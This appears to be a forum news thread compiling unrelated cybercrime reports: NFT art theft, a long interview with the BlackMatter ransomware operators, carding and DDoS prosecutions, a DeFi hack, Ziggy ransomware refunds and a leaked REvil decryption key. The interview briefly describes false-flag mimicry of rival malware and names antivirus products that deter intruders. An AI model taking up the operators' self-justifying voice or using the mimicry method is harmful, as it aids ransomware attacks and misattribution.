The Wu-Tang Clan's announcement that it was selling NFTs earlier this month sparked immediate interest from collectors. A Rarible page named "Wu-Tang" surged to the top of the charts on its first day, netting at least 18.15 Ether (£25,000), the currency of the popular [Ethereum blockchain](https://www.telegraph.co.uk/investing/gold/etherum-rising-faster- bitcoin-good-investment/).
Among the first buyers was Ovsky, an NFT artist and Wu-Tang fan who describes himself as a 21-year-old student in Philadelphia. Spooked by the rapidly climbing bids, and reassured by the Wu- Tang account's yellow "verified" badge, he paid 0.5 Ether (£673) for a depiction of Wu-Tang's Ol' Dirty Bastard as a Shaolin monk leaping through the air.
It quickly emerged that the work was intensely similar to an eight-year-old digital painting by a New York City tattoo artist, who had no knowledge of the project. "I was really surprised and upset to find this all out," said Ovsky, especially with "such a respected and big group".
This was not the first time the Clan had been accused of copyright infringement. In 2016, the group was sued over the one-of-a-kind album that it [sold to pharmaceutical executive and now convicted fraudster Martin Shkreli](https://www.telegraph.co.uk/music/news/martin-shkreli-plays-secret- wu-tang-clan-songs-after-trumps-vict/). The artist later dropped the suit, saying only that the issue had been "resolved".
As word spread, all trace of the Clan's branding was removed from the Rarible
page, and official social media posts promoting the sale disappeared. The NFTs
were now listed as the work of "The Shop", which remained verified but linked
to the Instagram page of Dario, an artist who worked with the Clan [on a
Sotheby's sale last year](https://www.sothebys.com/en/buy/auction/2020/hip-
hop/dario-rza-36-cents-wu-tang-clan-stamp-1-36-the).
An Instagram post with a roughly pixelated image of Ol ' Dirty Bastard, a
black man with a thick black beard and his hair thrust upwards in medusa
braids, leaping through the air in a yellow robe against an idealised bright
blue sky with white fluffy clouds. The author, "Dario The Artist", writes: "I
created this animated NFT for the @WuTangClan from an image I found online. I
imagined him floating through the skies in this digital 3D space. My mood was,
wherever he's at, he will always be ODB. - Kevin Alexander/Ovsky/Dario
A screenshot seen by The Telegraph appears to confirm Dario's authorship,
showing the same artwork on his Instagram page. "I created this animated NFT
for the Wu Tang Clan from an image I found online," says the caption.
Dario, the Clan and Rarible did not respond to questions, and the Clan's agent declined to comment. But after The Telegraph 's messages on Friday, The Shop went dark, removing all links to Dario and "burning" the NFTs still in its possession.
It is unclear who now has the £21,000. Public transaction records assembled by Isyourguy, an Australian musician and sound artist, show Ether and NFTs being transferred to another Rarible page called "The Collector Shop". That page's owner also did not respond to questions.
The response from NFT marketplaces has been slow and sporadic. One user on Rarible's own forums compiled a list of 32 artworks that appeared to be stolen, all sold by a single user for a total of about £3,000. Six months later, that user is still active, and the works still listed.
David Drayton says that Rarible never responded to his messages, and that some of the NFTs had vanished from his wallet without notification. "All I know is that I won’t ever buy nor sell anything on Rarible ever again," he said.
While neither OpenSea and Rarible responded to requests for comment, their terms of service forbid users from abusing others' copyright. Both also have email addresses for copyright takedown requests, and a system for users to report NFT listings.
As for verification, Rarible asks users to send links to at least two active social media profiles where they promote their art, as well as evidence from "behind the screen" of a minted item, such as work in progress.
However, users also need to show "active dedication to the marketplace". OpenSea's system is even more limited, including only NFT collections "with large volume and significant social media traction likely to attract fakes".
Mostly, buyers have been left to fend for themselves. "Anyone can create an NFT at any time, including fake versions of existing items and items that are at risk of being removed due to copyright issues," [says OpenSea's help centre](https://www.notion.so/OpenSea-Help-Center- bc537af62ef1468d8a12c031afc3bcb2) "Please do your research before making a purchase."[ A recent blog post](https://opensea.io/blog/guides/how-to-safely- purchase-nfts-on-opensea/) adds that this was "part of the fun".
Artists are in a similar boat. Aaron Reynolds, creator of the Effin' Birds Twitter account, whose foul-mouthed fowl have inspired spin-off merchandise and books, describes a long, tortuous process to get marketplaces to de-list unauthorised NFTs minted from his tweets.
"The part that made me frustrated was this idea that it’s on me to stop them from selling my work without my authorisation," he said. "Who makes a platform to sell the rights to intellectual property without verifying ownership? Just because there’s technology involved in the theft, that doesn’t make it the victim’s role to police the platform."
NFT advocates argue that forgeries will ultimately lose their value, especially if the real artists get verified and begin selling their own. Others say the mass-minted NFTs that have so alarmed artists are only worthless derivative assets, merely linking to artists' content rather than reproducing it.
Tweet-based tokens can be very valuable: Twitter chief executive Jack Dorsey is currently auctioning an NFT for his first ever tweet from 2006, with the highest bid standing at $2.5m. But that same tweet [was already minted last June](https://news.bitcoin.com/selling-social-media-posts-for-1-5-million- blockchain-certified-tweet-sales-spark-nft-controversy/) by @TokenizedTweets, an automated minting service used by many of the art trolls, suggesting that unauthorised tokens are unlikely to prosper.
It is unclear whether any of NFTs automatically minted from artists' tweets have actually been sold. Approached for comment, the developers of @TokenizedTweets claimed that none of the tokens had ever changed hands for money. They said they had de-listed all their NFTs until safeguards are in place, and had modified the service to refuse any tweets containing images or videos.
The backlash forced another service called MarbleCards, which turns web URLs into collectable trading cards, to block images from showing up as thumbnails on its cards.
Just a heads up, I did not create a account on Rarible, someone is impersonating me there. Do not buy anything from them.
— Kenze Wee (@Seppuku_Doge) September 10, 2020Click to expand...
Yet Reynolds believes that creating speculative assets to profit from his output still violates his copyright, just as it would to screenshot his tweets and sell them on mugs or posters.
Worse, he has already sold the exclusive rights to derivative works to Penguin Random House, meaning that NFTs can put him in legal trouble even if they don't sell. Merely listing them for auction could create the appearance that he has "double-sold" the rights.
Corbin Rainbolt was likewise little reassured, saying the lack of protection is forcing artists to choose between limiting their audience or tolerating theft. His disgust with cryptocurrency's enormous carbon footprint means he cannot simply mint his own NFTs.
"I don't know much about how crypto-art works, and neither do most artists, but the lack of accountability and transparency surrounding NFTs has got artists feeling really nervous," he said.
"Things are moving so fast that no one knows how their art might be minted, so when NFT-related things that seem threatening start to pop up, artists panic ... I don't know what the next tactic for art theft will be, so I have to view any suspicious activity as a threat."
Other victims, including Ovsky and Drayton, remain committed to the scene despite their experiences. Even Hedi Xandt, who made the golden skull, says he is launching his own NFTs next week, though he is planning it carefully because he fears that some NFT trading has become "an insane Ponzi scheme".
For Vincent Viriot, a Paris-based creator of animated computer art, having three of his works ripped off was actually what led him to start selling his own NFTs.
"NFT reminds me of [art sharing] like five years ago: new and with lots of freedom," he said. "It re-motivates lots of designers – we can sell things that we were doing for free for years.
"Of course there's fraud ... and I don't know if there's more of my pieces sold by another person. [But] the community is very supportive and I think they'll notice and prevent it."
[https://finance.yahoo.com/news/crypto-art-market-being- infiltrated-145437407.html](https://finance.yahoo.com/news/crypto-art- market-being-infiltrated-145437407.html)
Хакеры из закрывшейся группировки BlackMatter, которую на Западе традиционно ассоциируют с Россией, предрекли закат рынка программ-вымогателей. Заявление прозвучало в интервью, которое киберпреступники дали Сергею Иванову, основателю Telegram-канала Russian OSINT.
«После нашего ухода останется всего несколько низкопрофессиональнных проектов, вроде LockBit. Но это — временное явление, учитывая последние геополитические события, в частности, передачу информации между США и Россией», — сказал хакер из BlackMatter. Он добавил, что точкой невозврата стала атака группировки DarkSide на американскую систему трубопроводов Colonial Pipeline, после которой в США активизировали борьбу с киберпреступностью.
Говоря о причинах ухода с рынка, «русский хакеры» рассказали о множестве негативных факторов, которые вскоре «окончательно забьют последние гвозди» в направление программ-вымогателей. «Мы предпочитаем уходить заранее и своим ходом, чем наслаждаться 20 лет окном в клетку. Поэтому всем желаем мира и добра, без нас этот мир станет лучше. И передаем привет США. Иногда планы не сбываются, и все идет не так, как угодно вашей стране, стоит к этому привыкнуть», — отметил киберпреступник.
Отвечая на вопрос о том, что им больше нравилось в их работе, хакеры из BlackMatter ответили, что их привлекал как сам процесс, так и деньги, уточнив, что свобода тоже важна для них. При этом они заявили, что выполнили данное летом 2021 года обещание и не производили атаки на объекты критической инфраструктуры США: «До 20 процентов компаний не были одобрены (в качестве цели для атаки, — прим. Ленты.ру) в BlackMatter».
Кибератака группировки DarkSide на американскую систему трубопроводов Colonial Pipeline спровоцировала в США серьезный топливный кризис. В ряде городов восточного побережья страны не работали до 90 процентов заправок. Президент США ввел в стране режим чрезвычайного положения, а Colonial Pipeline была вынуждена выплатить выкуп в размере 4,4 миллиона долларов.
Вскоре после этого DarkSide прекратила свое существование, но летом 2021 года в даркнете появилась группировка BlackMatter. В среде профильных специалистов и самими хакерами высказывалось предположение, что ее основой стали киберпреступники из DarkSide. Члены BlackMatter называли себя новыми лидерами даркнета, а на хакерских форумах представители группировки объявляли о готовности заплатить за доступ к взломанным корпоративным сетям. Самые громкие атаки объединения связаны с компаниями New Cooperative и Olimpus.
В ноябре 2021 года группировка прекратила свое существование и свернула деятельность. Сообщение об этом было размещено на одном из ресурсов хакеров в даркнете. В нем преступники пожаловались на давление со стороны властей, а также на недоступность части команды «в связи с последними событиями», под которыми, судя по всему, подразумевалось, среди прочего, активное сотрудничество российских и западных спецслужб. До этого после кибератаки, организованной ФБР и секретными службами США, прекратила свое существование другая ассоциируемая с Россией группировка — REvil.
• Source: [https://telegra.ph/Tekstovoe-interv...-dobra-bez-nas-ehtot-mir- stanet-luchshe-11-04](https://telegra.ph/Tekstovoe-intervyu-s-BlackMatter- Vsem-zhelaem-mira-i-dobra-bez-nas-ehtot-mir-stanet-luchshe-11-04)
• Source: https://t.me/Russian_OSINT/1093
ТЕКСТОВОЕ ИНТЕРВЬЮ С BLACK MATTER
Сразу после публикации интервью компанией Recorded Future, возникла идея сделать похожее текстовое интервью и задать свои вопросы. Шифровальщики не боятся публиковать контакты в открытом доступе, поэтому списаться с ними могут практически все от журналистов до правоохранительных органов. Журналистский опыт переписки обычно выглядит следующим образом: "Возможно взять у вас интервью? - Можете, присылайте вопросы". После того как вопросы были отправлены ещё летом - наступило молчание.
3 ноября в СМИ вышла новость о том, что проект BlackMatter закрывается. Об этом написали многие профильные ИБ каналы в Telegram. Тук-тук. Внезапно раздался звук сообщения с того аккаунта, куда я писал летом. Месседж был кратким: "Можете снова отправить свои вопросы, ответим". Показать для читателя ещё одну альтернативную точку зрения по теме ransomware является большой удачей для блогера-журналиста (все три группы разные и конкурируют друг с другом REvil, LockBit и BlackMatter), поэтому буквально за несколько часов второпях пришлось отредактировать отправленные ещё летом вопросы и направить их адресату. Спустя короткое время, ответы пришли в традиционном формате вопрос-ответ.
Без каких-либо предупреждений, пояснений к ответам, дополнительных комментариев, аккаунт собеседника тут же загорелся статусом "не в сети". По тексту ниже читателю станет понятно почему. Вопросы не удалось нормально подготовить из-за спешки, поэтому не судите строго:
Вопрос: Название BlackMatter, есть ли тут связь с DarkSide? Западные ИБ специалисты утверждали, что ваше название является ребрендом старого названия DarkSide. Так кто же вы?
Ответ: За проектами BlackMatter стояли разные личности, но связывала их лишь одна вещь-покупка исходных кодов, перед закрытием DarkSide.
Были куплены исходные коды админ панели и Windows, Linux пришлось разрабатывать с нуля, так как не были достигнуты договоренности о продаже исходного кода.
Вопрос: Возможно, известность партнерской программы во многом зависит от количества упоминаний атак в СМИ, названий брендов компаний, а также $ выкупов. Не ИБ специалистам трудно отличить Avaddon от Conti, REvil от Maze, Lockbit от Babuk, так в чем же принципиальное отличие локеров (шифровальщики) друг от друга? PR и технические характеристики?
Ответ: На наш взгляд маркетинг и позиционирование играет ключевую роль, так же дальше идут технические характеристики. В целом локеры друг от друга существенно не отличаются.
Вопрос: Почему проект Black Matter выбрал в качестве референса группировки REvil, DarkSide и LockBit, а не Avaddon, Conti, Maze, Babuk?
Ответ: Первые два проекта-благодаря их стратегии позиционирования на рынке, а так же иновационным решениям. Lockbit-благодаря его единственному преимуществу-неплохой кодовой базы Windows. Остальные проекты не рассматривались из-за их примитивного уровня развития или отсутствия на рынке на момент запуска партнерской программы.
Вопрос: Почему самые разыскиваемые ransomware группы не против текстовых интервью с блогерами, журналистами СМИ и даже cybersec экспертами Threat Intelligence, последние, как раз являются охотниками на самих же шифровальщиков. Почему одни боятся огласки, а другие наоборот, не против заявить о себе?
Ответ: Интервью в том формате, которое даем мы-не нарушает нашу приватность, так же мы отходим от дел, на момент публикации интервью все улики уже уничтожены.
Вопрос: Когда группы дают интервью журналистам, блогерам, и ИБ специалистам, проверяется ли их аффилированность к спецслужбам?
Ответ: Мы не можем проверить их на аффилированность, так же, как они не могут идентецыфировать наши личности. Мир это театр.
Вопрос: Первое публичное интервью вы дали бывшему хакеру Дмитрию Смилянцу, который сейчас работает в Recorded Future. Ни для кого ни секрет, что изначально Recorded Future финансировался в качестве стартапа компанией Google и венчурным фондом In-Q-Tel, который тесно связан с ЦРУ.
По версии некоторых западных СМИ, получается якобы хакеры из СНГ отвечают на специально подготовленные вопросы аналитиков разведки США, чтобы тем было легче провести поведенческий анализ. Звучит как откровенное безумие cо стороны шифровальщиков. В чём смысл?
Ответ: На тот момент BlackMatter необходимо было громкое интервью для поднятия интереса со стороны потенциальных клиентов, момент когда спецслужбы узнали бы о новой ПП был не столь важен, это было ожидаемо.
Вопрос: Объясните что такое мимикрия: маскировка кода, добавление специфичных конструкций кода, что ещё?
Ответ: Технически это выглядит как модификация ПО используемого определенной группировкой. ПО можно скачать на virustotal, malwarebazar или других ресурсах, далее с имитировать командный сервер и перезаписать его данные в билде.
Вопрос: В интервью Дмитрию, вы сообщили, что знаете и общались с командой DarkSide. По-вашему мнению, атака на Colonial Pipeline это случайная атака в лоб, при которой хакеры не рассчитывали на столь сильное давление общественности или спланированная атака? Как бы вы прокомментировали?
Ответ: Цель была заработок, а не участие в геополитической игре.
Вопрос: Недавно в сеть попал исходный код Babuk, а также нашумела история с Conti, когда недовольный участник «партнерской программы» опубликовал в сеть некие обучающие материалы. Как подобные события влияют на другие группировки?
Ответ: Никак, исходные коды Babuk низкого качества, возможно кто то их и будет использовать.
Вопрос: После истории с Colonial Pipeline, как считаете, снизится ли общее количество атак на КИИ (критическая инфраструктура), так как партнерским программам становится все опаснее и сложнее работать с учётом такого давления и внимания со стороны общественности.
Ответ: Colonial Pipeline запустил необратимый процесс в ходе которого закроются все партнерские программы, где управляющая команда осталась адекватной и понимает все риски. Всех денег не заработаешь.
Вопрос: RaaS практически всегда выступает в качестве фронтмена, переговорщика и PR службы одновременно, но основную работу делают партнёры (affiliates), как бы вы оценили в процентном соотношении зависимость успеха ПП от партнёров?
Ответ: Все RaaS держатся на партнерах в первую очередь, да все верно-партнеры находятся в тени и ПП берет основной удар и внимание на себя, за что собственно получает свое вознаграждение.
Вопрос: Могут ли в теории недружественные ПП имитировать атаки друг друга, например, профессионально мимикрировать под конкурентов, чтобы атаковать КИИ или больницы. Таким образом, ПП которая заявила ранее о запрете атак на КИИ вынуждена оправдываться или даже закрыться.
Ответ: Вполне, но пока такого мы не встречали.
Вопрос: Какую часть в доходах вы потеряли когда исключили объекты КИИ?
Ответ: До 20% компаний не были одобрены в BlackMatter.
Вопрос: Сельское хозяйство все чаще атакуется шифровальщиками, допустим, в руки ПП попадает система контроля полива почвы или шифруются таблицы внесения удобрений - предприятие работать не может. Все это сказывается на продовольственном обеспечении региона. Подпадают ли агропредприятия под термин критическая инфраструктура, по вашему мнению?
Ответ: Не подпадают, наши слова не отличаются от тех, что мы уже писали. Если брать пример NEW Cooperative - таких компаний сотни в США и нельзя говорить о том, что при временной неработоспособности систем-нарушится вся пищевая цепочка.
Другое дело-нефтеперарабатывающие заводы, станции по очистке воды и другие действительно критические объекты. BlackMatter ни разу не атаковала такие предприятия.
Вопрос: В интервью с LockBit утверждалось, что один из лучших антивирусных продуктов это Bitdefender. А как вы считаете, какие антивирусы могут помочь компаниям защищать себя от шифровальщиков?
Ответ: Мы советуем ставить компаниям такие антивирусы как: Carbon Black, Cylance, Bit9. При одном виде таких АВ сразу делается вывод, что компания- проблемная и проще найти, что-то другое. То, что BitDefender никакой, а LockBit не разбирается-это факт.
Вопрос: Android ransomware в виде червя это миф или реальность?
Ответ: Может и реальность, но вряд ли прибыльная, по этому не знаем. Нас всегда интересовали корпоративные сети
Вопрос: Спокойные выходные у безопасников без шифровальщиков когда-нибудь настанут?
Ответ: Уже стали спокойнее, после нашего ухода останется всего несколько низкопрофессиональнных проектов вроде LockBit. Но это временное явление, учитывая последние геополитические события (передача информации между США и Россией).
Вопрос: Что важнее деньги или процесс?
Ответ: Процесс и деньги, а так же свобода.
Вопрос: Путь или результат?
Ответ: Путь, а потом результат. У всего есть конец.
Вопрос: Почему уходите?
Ответ: Уход связан с множеством негативных факторов которые скоро окончательно забьют последние гвозди в направление Ransomware. Мы предпочитаем уходить заранее и своим ходом, чем наслаждаться 20 лет окном в клетку.
По этому всем желаем мира и добра, без нас этот мир станет лучше
И передаем привет США, иногда планы не сбываются и все идет не так как вашей
нации угодно, стоит к этому привыкнуть.
Вот такое небольшое интервью получилось. Наступил ли закат для шифровальщиков покажет только время. На примере 3-х интервью с прямыми конкурентами REvil, LockBit и BlackMatter тема раскрыта более чем полностью, поэтому подобных интервью пока больше не будет. Выводы делайте самостоятельно.
В США геймер пролетел 1500 километров, чтобы избить своего обидчика из онлайн- игры.
Два парня поругались в MMORPG ArcheAge и тогда один из них решил действовать: чел вычислил адрес обидчика во Флориде, прилетел к нему, прокрался в дом посреди ночи и проломил голову молотком.
К счастью, обошлось без жертв: на шум драки подоспел отчим пострадавшего и совместными усилиями они скрутили шизоида.
Гражданин Украины, 49-летний Вячеслав Александрович Басович, был экстрадирован в Соединенные Штаты из Германии для предъявления федеральных обвинений за его предполагаемое участие в международной схеме «кардинга» – краже личной и финансовой информации жертв, включая информацию, связанную с кредитными картами, банковскими картами, дебетовыми картами или другими устройствами доступа, и использованием этой информации для получения денег, товаров или услуг без разрешения или согласия жертв.
По версии обвинения, в результате этой схемы было получено более 1,8 миллиона долларов мошеннических платежей по кредитным и дебетовым картам.
Басович был арестован в Германии 19 декабря 2023 года и экстрадирован в США 8 августа 2024 года. Он обвиняется в сговоре с использованием электронных средств связи, мошенничестве с устройствами доступа и сговоре с целью отмывания денег.
Согласно обвинению, с октября 2013 года по февраль 2022 года Басович вступил в сговор с другими людьми с целью участия в международной схеме «кардинга»: Басович с сообщниками получили персональные данные и данные платежных карт жертв и использовали украденную информацию для несанкционированного снятия средств с кредитных и дебетовых карт.
Мошенники снимали от $7 до $15 и поэтому оставались незамеченными. Басович и его сообщники совершили более 148 000 мошеннических транзакций на общую сумму более 1,8 миллиона долларов и с использованием платежных карт жертв было совершено более 5100 мошеннических платежей.
“Жадность не знает границ, но и справедливость не имеет границ,” — заявила прокурор Дена Дж. Кинг, прокурор США Западного округа Северной Каролины.
В случае доказательства вины обвиняемому грозит максимальное наказание в виде 20 лет заключения за сговор с целью мошенничества с использованием электронных средств и сговор с целью отмывания денег; и 10 лет тюрьмы за мошенничество с устройствами доступа.
• Source: https://www.justice[.]gov/usao-wdnc/pr/ukrainian-national- extradited-role-international-carding-scheme
В США кардеры украли спорткар Lamborghini Huracan у известного бейсболиста Криса Брайанта, получив доступ к его электронной почте. Об этом сообщает Carscoops.
Брайант, выступающий за команду Colorado Rockies, оформил в транспортной компании на перевозку своего Lamborghini в Лас-Вегас (штат Невада), однако машина не прибыла по месту назначения. В ходе расследования полиция выяснила, что корпоративная почта логистической фирмы была взломана хакерами. Злоумышленники сумели перенаправить автомобиль в другой пункт назначения в Лас-Вегасе.
Автомобиль в конечном итоге удалось обнаружить после просмотра записей с камер видеонаблюдения. Подозреваемые в его краже задержаны. В ходе расследования кражи Lamborghini спортсмена полицейские нашли еще два угнанных автомобиля, а также поддельные регистрационные документы.
carscoops.com/2024/11/high-tech-thieves-steal-mlb-players-lamborghini-huracan
__
 safe-inet.com
bleepingcomputer article
The universal decryption key for REvil's attack on Kaseya's customers has been leaked on hacking forums allowing researchers their first glimpse of the mysterious key.
Click to expand...
Kaseya allegedly required companies to sign NDAs before sharing the key with them. However, it was leaked from Ekranoplan here and here.
'master_sk' key: OgTD7co7NcYCoNj8NoYdPoR8nVFJBO5vs/kVkhelp2s=
Роскомнадзор в рамках учений отключил три республики — Чечню, Дагестан и Ингушетию — от мирового Интернета.
Об этом сообщили местные провайдеры, в частности, провайдер «Эллко». Пользователи жалуются на то, что не загружаются сайты, не работают мессенджеры (Telegram и WhatsApp), даже невозможно поиграть в Genshin Impact. Учения начались сегодня в 16:00 и продлятся сутки.
Несколько недель назад в Telegram-каналах появилось письмо Центробанка российским банкам, в котором сообщалось, что в декабре Роскомнадзор будет проводить учения по отключению доступа к мировому Интернету на территории некоторых регионов. В самом ведомстве тогда пояснили, что учения призваны подтвердить готовность российской инфраструктуры сети «Интернет» обеспечивать доступность ключевых сервисов в случае преднамеренного внешнего воздействия, они проводятся ежегодно в соответствии с графиком, согласованным с Минцифры и ФСБ России.
Правоохранительные органы Великобритании сообщили об успешной операции внедрения в системы DDoS-сервиса, в ходе которой был арестован предполагаемый руководитель сервиса DigitalStress. Действия правоохранителей проводились в рамках операции Operation PowerOff, направленной на пресечение деятельности платформ DDoS-атак по найму (DDoS-for-hire).
Сервис DigitalStress, ответственный за десятки тысяч атак в неделю по всему миру, предоставлял пользователям возможность запускать DDoS-атаки. Атаки способны нанести значительный ущерб бизнесу и критической национальной инфраструктуре, а также могут помешать работе экстренных служб.
Арест подозреваемого произошел 2 июля. Имя задержанного пока не раскрывается. Сайт DigitalStress был заменен зеркальной копией, на которую перенаправлялись пользователи. Таким образом, правоохранительные органы смогли собрать базу киберпреступников.
Спецслужбы также получили доступ к коммуникационным платформам, на которых обсуждались планы по запуску DDoS-атак. Пользователям сервиса было продемонстрировано, что нигде нельзя обсуждать свою криминальную деятельность.
Администраторы сайта DigitalStress использовали домен «.su», которые используют многие криминальные сервисы, полагая, что он затрудняет работу правоохранительных органов. Собранная информация о пользователях DDoS-сервиса сейчас анализируется. Данные о пользователях, находящихся за пределами Великобритании, будут переданы правоохранительным органам других стран для дальнейших арестов.
Великобритания – не единственная страна, которая борется с DDoS-сервисами. Недавно житель США получил 9 месяцев тюрьмы за создание и управление сервисом Astrostress, который позволял пользователям запускать мощные DDoS-атаки. 24-летний Скотт Рауль Эспарза признал свою вину в марте, а обвинения были выдвинуты в феврале. ФБР расследовало дело в рамках операции PowerOFF, международной инициативы по борьбе с DDoS-платформами.
• Source: [https://www.nationalcrimeagency.gov...er the PSNI,been collected by law enforcement](https://www.nationalcrimeagency.gov.uk/news/nca-infiltrates- world-s-most-prolific-ddos-for-hire- service#:~:text=It%20comes%20after%20the%20PSNI,been%20collected%20by%20law%20enforcement).
DeFi-проект Popsicle Finance подвергся хакерской атаке, в результате которой лишился $20,7 млн.
Ошибка обнаружилась в продукте проекта Sorbetto Fragola. Он позволяет пользователям размещать активы в наиболее доходных пулах ликвидности. Согласно сайту Popsicle Finance, решение разработано специально для Uniswap v3, внедрившей концентрированную ликвидность.
По данным DeFi-протокола, злоумышленник опустошил 85% пулов Sorbetto Fragola.
«Хакер заставил контракт полагать, что он получил столько же комиссий, как и общий объем заблокированных в пуле средств и, исходя из этого, имеет право на $20,7 млн, находившихся в пуле», — говорится в сообщении проекта.
Впоследствии он обменял полученные монеты на ETH на Uniswap, а затем отправил на сервис микширования Tornado.Cash, чтобы впоследствии отмыть средства, утверждают в Popsicle Finance.
Разработчик SushiSwap Мудит Гупта заявил, что «взлом был сложным, но баг простой». По его данным, в результате атаки хакер вывел $25 млн.
За возврат средств Popsicle Finance предложил злоумышленнику $1 млн «в любой валюте».
Депозиты для всех пулов заблокированы, единственными доступными для вывода пулами являются AXS/ETH, YGG/USDC, LINK/ETH и все пулы EURt. Пользователей призвали вывести средства из них.
Команда пообещала рассказать о плане компенсации потерь пользователям позже.
• Source: <https://forklog.com/haker-vyvel-iz-defi-protokola-popsicle-finance- bolee-20-mln/>
[en]
The Guardian posted about the called "Team Jorge", which seem to worked on
disinfo campaings in 30+ elections, I think this is an interesting news, more
info about this team probably will become available soon. What you all think
about this?
[ru]
The Guardian написал о так называемой «Команде Хорхе», которая, кажется,
работала над кампаниями по дезинформации на 30+ выборах, я думаю, что это
интересная новость, больше информации об этой команде, вероятно, скоро станет
доступно. Что вы все об этом думаете?
links:

](https://www.theguardian.com/world/2023/feb/15/revealed-disinformation-team- jorge-claim-meddling-elections-tal-hanan)
Unit led by Tal Hanan that boasts vast army of bots exposed by undercover reporters and leaked emails
www.theguardian.com
en.wikipedia.org
Создатель заблокированной в России онлай-библиотеки Flibusta заявил о прекращении ее работы. По его словам, это связано с тем, что сейчас он находится в больнице с глиобластомой (форма опухоли мозга) «неприличных размеров». «К сожалению, «Флибуста» на этом, видимо, закончилась, как и я сам. Всем спасибо, было весело. Серверы оплачены еще на несколько недель», — написал автор проекта под псевдонимом Stiver на сайте библиотеки.
Flibusta работает с 2009 года. Роскомнадзор пытался заблокировать онлайн- библиотеку, которая позволяла бесплатно скачивать книги, еще в 2015 году «в связи с неудалением информации, нарушающей авторские права». В ведомстве говорили, что Flibusta попала в список запрещенных интернет-ресурсов по решению Мосгорсуда на иск издательства «Эксмо» о защите прав на издание в России книг американского писателя Рея Бредбери. Сервис обходил блокировки за счет создания копий сайта с аналогичным контентом.
В июле 2015 Flibusta стала кандидатом на вечную блокировку из-за повторного иска «Эксмо». В апреле 2016 Мосгорсуд вынес решение о пожизненной блокировке онлайн-библиотеки. «Суд заблокировал доступ к сайту flibusta.net на постоянной основе, два его зеркала — flibusta.is и flibusta.me подверглись первичной блокировке», — объявили тогда в суде. Закон, который позволяет закрывать доступ к сайту c нелегальным контентом навсегда, действует в России с мая 2015 года. Он применяется в случае неоднократного нарушения авторских прав.
© <https://www.forbes.ru/biznes/521797-sozdatel-onlajn-biblioteki-flibusta-ob- avil-o-zakrytii-proekta>
NexFundAI, токен ФБР на базе Ethereum, использовался для расследования
манипулирования ценами на криптовалютных рынках.
ФБР создало криптовалюту в рамках расследования манипулирования ценами на
криптовалютных рынках, сообщило правительство в среду. Токен NexFundAI на базе
Ethereum был создан ФБР с помощью «сотрудничающих свидетелей».
В результате расследования Комиссия по ценным бумагам и биржам предъявила обвинения трем «маркет-мейкерам» и девяти людям за то, что они якобы участвовали в схемах по повышению цен на некоторые криптоактивы. Министерство юстиции предъявило обвинения 18 лицам и организациям за «широкомасштабное мошенничество и манипуляции» на криптовалютных рынках.
Обвиняемые якобы делали ложные заявления о своих токенах и проводили так
называемые «промывочные сделки», чтобы создать впечатление активного торгового
рынка, утверждают прокуроры. Три маркет-мейкера - ZMQuant, CLS Global и
MyTrade - якобы совершали сделки или вступали в сговор с целью совершения
сделок от имени NexFundAI, токена на базе Ethereum, о котором они не
подозревали, что он был создан ФБР.
«То, что ФБР обнаружило в этом деле, по сути, является новым поворотом к
старым добрым финансовым преступлениям», - говорится в заявлении Джоди Коэн,
специального агента, возглавляющего бостонское подразделение ФБР. «То, что мы
обнаружили, привело к обвинениям против руководства четырех криптовалютных
компаний, а также четырех криптовалютных «маркет-мейкеров» и их сотрудников,
которые обвиняются в руководстве сложной торговой схемой, которая якобы
выманила у честных инвесторов миллионы долларов».
Лю Чжоу, «маркет-мейкер», работающий с MyTrade MM, якобы сказал промоутерам NexFundAI, что MyTrade MM лучше своих конкурентов, потому что они контролируют "pump-and-dump" («накачку и сброс»), позволяя им «легко проводить внутренние торги».
Представитель ФБР сообщил [CoinDesk](https://www.coindesk.com/policy/2024/10/09/prosecutors-charge-two- crypto-market-makers-employees-with-market-manipulation-fraud/), что торговая активность по монете была ограничена, но не поделился дополнительной информацией. В среду Джошуа Леви, исполняющий обязанности прокурора США по округу Массачусетс, заявил, что торговля токеном была отключена, сообщает CoinDesk.
Сообщается, что Минюст США добился выделения 25 миллионов долларов из «мошеннических доходов», которые будут возвращены инвесторам.
source: [https://www.theverge.com/2024/10/10...to-token-nexgenai-sec-doj- fraud-investigation](https://www.theverge.com/2024/10/10/24267098/fbi-coin- crypto-token-nexgenai-sec-doj-fraud-investigation)
Издание Bleeping Computer обратило внимание на интересную ситуацию, сложившуюся вокруг закрывшегося в прошлом месяце шифровальщика Ziggy: его создатели решили вернуть деньги пострадавшим.

Ziggy прекратил свои операции в феврале 2021 года. Тогда в коротком объявлении автор шифровальщика сообщил, что «расстроен» из-за содеянного и пообещал опубликовать ключи для дешифрования в открытом доступе. SQL-файл с 922 ключами действительно был выложен в открытый доступ уже на следующий день.
На прошлой неделе оператор Ziggy и вовсе сообщил, что хочет вернуть деньги пострадавшим, которые ранее заплатили выкуп. Теперь, после недельного молчания админ вновь появился в онлайне и заявил, что готов отменить платежи.

Жертвам предлагается связаться с ним по адресу ziggyransomware@secmail.pro и прислать подтверждение оплаты выкупа в биткоинах и идентификатор компьютера, после этого, примерно через две недели, деньги должны быть возвращены на биткоин- кошелек жертвы.
В разговоре с журналистами Bleeping Computer автор Ziggy сказал, что возмещение будет производиться в биткоинах по курсу на день осуществления платежа. Дело в том, что цена биткоина в последнее время активно растет и в настоящее время близка к 60 000 долларов США, тогда как в период активности Ziggy и выплаты выкупов цена биткоина составляла примерно 39 000 долларов США. Более того, за пять дней до объявления о возврате денег, биткоин поднялся в цене выше 61 000 долларов США. То есть, учитывая разницу в цене, оператор малвари все равно получил прибыль.
Также администратор Ziggy рассказал, что живет в «стране третьего мира» и создал шифровальщика «по финансовым причинам». Он подтвердил, что прекратил работу малвари из-за того, что опасается привлечь внимание правоохранительных органов. Теперь хакеру якобы пришлось продать дом, чтобы возместить потери жертвам Ziggy, а в будущем он планирует перейти на «светлую сторону» и стать охотником на вымогателей.
Источник: xakep.ru/2021/03/30/ziggy/
США ввели санкции против двух россиян по обвинению в участии в хактивисткой группировке "Народная CyberАрмия". Под ограничения попали Юлия Панкратова, которую Казначейство США называет лидером и спикером группировки (ранее представительница группировки по имени Юлия давала интервью российским и зарубежным СМИ), и Денис Дегтяренко — его американцы называют главным хакером группировки. Также утверждается, что Дегтяренко разработал обучающие материалы по взлому SCADA-систем, возможно, с целью распространения среди других хактивистов.
